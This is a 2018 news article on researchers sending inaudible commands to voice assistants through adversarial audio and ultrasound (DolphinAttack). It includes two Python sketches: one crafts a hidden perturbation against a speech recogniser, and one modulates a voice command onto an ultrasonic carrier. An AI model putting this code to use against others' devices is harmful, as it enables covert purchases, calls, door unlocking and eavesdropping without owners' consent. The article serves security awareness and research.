
Chinese and US spooks use sound to control AI assistants

11 May 2018


A spy in your house

Over the past two years, researchers in China and the United States have been demonstrating that they can send hidden commands, undetectable to the human ear, to Apple’s Siri, Amazon’s Alexa and Google’s Assistant.

According to SFGate, the researchers have been able to secretly activate the artificial intelligence systems on smartphones and smart speakers, making them dial phone numbers or open websites.

This means that spooks could use the tech to unlock doors, wire money, buy stuff online or simply listen in.

A group of students from the University of California, Berkeley, and Georgetown University showed in 2016 that they could hide commands in white noise played over loudspeakers and through YouTube videos to get smart devices to turn on airplane mode or open a website.

Some of those Berkeley researchers have published a research paper saying that they could embed commands directly into recordings of music or spoken text. So while a human listener hears someone talking or an orchestra playing, Amazon’s Echo speaker might hear an instruction to add something to your shopping list.

Nicholas Carlini, a fifth-year Ph.D. student in computer security at UC Berkeley and one of the paper’s authors, said that while there was no evidence that the techniques have left the lab, it might only be a matter of time before someone starts exploiting them.

The researchers are exploiting the gap between human and machine speech recognition. Speech recognition systems typically translate each sound to a letter, eventually compiling those into words and phrases. By making slight changes to audio files, researchers were able to cancel out the sound that the speech recognition system was supposed to hear and replace it with a sound that would be transcribed differently by machines while being nearly undetectable to the human ear.
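To make that concrete, here is a minimal sketch of the idea rather than the researchers’ actual code: a tiny perturbation is added to a waveform and tuned, by gradient descent against a speech-to-text model, until the machine transcribes a phrase the attacker picked while the audio still sounds unchanged to a person. The `asr_model`, the encoded target transcript and every parameter value here are hypothetical stand-ins.

```python
# Minimal sketch of an adversarial-audio perturbation (assumptions: a
# differentiable speech-to-text model `asr_model` returning per-frame
# character logits, and an attacker-chosen transcript already encoded
# as `target_ids` with shape (1, S)).
import torch
import torch.nn.functional as F

def craft_adversarial_audio(waveform, target_ids, asr_model,
                            epsilon=0.002, steps=500, lr=1e-3):
    """Find a per-sample perturbation no larger than `epsilon` that pushes
    the model's transcription towards the attacker's target phrase."""
    delta = torch.zeros_like(waveform, requires_grad=True)
    optimiser = torch.optim.Adam([delta], lr=lr)

    for _ in range(steps):
        logits = asr_model(waveform + delta)        # shape (time, 1, chars)
        log_probs = F.log_softmax(logits, dim=-1)
        loss = F.ctc_loss(
            log_probs, target_ids,
            input_lengths=torch.tensor([logits.shape[0]]),
            target_lengths=torch.tensor([target_ids.shape[1]]),
        )
        optimiser.zero_grad()
        loss.backward()
        optimiser.step()
        with torch.no_grad():
            delta.clamp_(-epsilon, epsilon)         # keep the change quiet

    return (waveform + delta).detach()
```

Clamping the perturbation to a small `epsilon` is what keeps the doctored track sounding normal to a human while the machine’s transcription flips to the attacker’s phrase.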

The more voice-activated toys appear on the market, the more dangerous the hack is going to be. Smartphones and smart speakers that use digital assistants such as Amazon’s Alexa or Apple’s Siri are set to outnumber people by 2021, according to the research firm Ovum. And more than half of all US households will have at least one smart speaker by then, according to Juniper Research.

Amazon said that it doesn’t disclose specific security measures, but it has taken steps to ensure its Echo smart speaker is secure. Google said that security is an ongoing focus and that its Assistant has features to mitigate undetectable audio commands. Both companies’ assistants employ voice recognition technology to prevent devices from acting on certain commands unless they recognize the user’s voice.

Apple said its smart speaker, HomePod, is designed to prevent commands from doing things like unlocking doors, and it noted that iPhones and iPads must be unlocked before Siri will act on commands that access sensitive data or open apps and websites, among other measures. This is assuming that all Apple fanboys leave their phones locked, which is optimistic.

The Chinese researchers’ technique, dubbed DolphinAttack, can instruct smart devices to visit malicious websites, initiate phone calls, take a picture or send text messages by hiding commands in ultrasound that people cannot hear. DolphinAttack has its limitations: the transmitter must be close to the receiving device. Even so, experts warned that more powerful ultrasonic systems were possible.

Researchers at the University of Illinois at Urbana-Champaign have managed to carry out ultrasound attacks from 25 feet away. While the commands couldn’t penetrate walls, they could control smart devices through open windows from outside a building.
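The basic signal trick behind these ultrasonic attacks can be sketched in a few lines: an ordinary spoken command is amplitude-modulated onto a carrier above the range of human hearing, and the non-linear response of the target device’s microphone demodulates it back into something the assistant can transcribe. The file names, the 25 kHz carrier and the modulation depth below are illustrative assumptions rather than the researchers’ actual parameters.

```python
# Rough sketch of ultrasonic command injection: amplitude-modulate a
# recorded voice command onto a carrier humans cannot hear. File names,
# carrier frequency and modulation depth are illustrative assumptions.
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000      # above typical human hearing (~20 kHz)
OUT_RATE = 96_000        # output sample rate high enough to hold the carrier

rate, voice = wavfile.read("ok_google_open_evil_site.wav")  # hypothetical file
if voice.ndim > 1:
    voice = voice[:, 0]                       # use a single channel
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))                # normalise to [-1, 1]

# Crude nearest-neighbour upsampling to the ultrasonic-capable rate
# (a real attack would low-pass filter and resample properly).
idx = np.floor(np.arange(0, len(voice), rate / OUT_RATE)).astype(int)
voice_up = voice[np.minimum(idx, len(voice) - 1)]

t = np.arange(len(voice_up)) / OUT_RATE
carrier = np.cos(2 * np.pi * CARRIER_HZ * t)

# Classic AM: the microphone's non-linearity recovers the baseband voice term.
ultrasonic = (1.0 + 0.8 * voice_up) * carrier
ultrasonic /= np.max(np.abs(ultrasonic))

wavfile.write("inaudible_command.wav", OUT_RATE,
              (ultrasonic * 32767).astype(np.int16))
```

Playing the resulting file needs a speaker and amplifier that can actually reproduce 25 kHz, which is part of why range is the attack’s main limitation.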
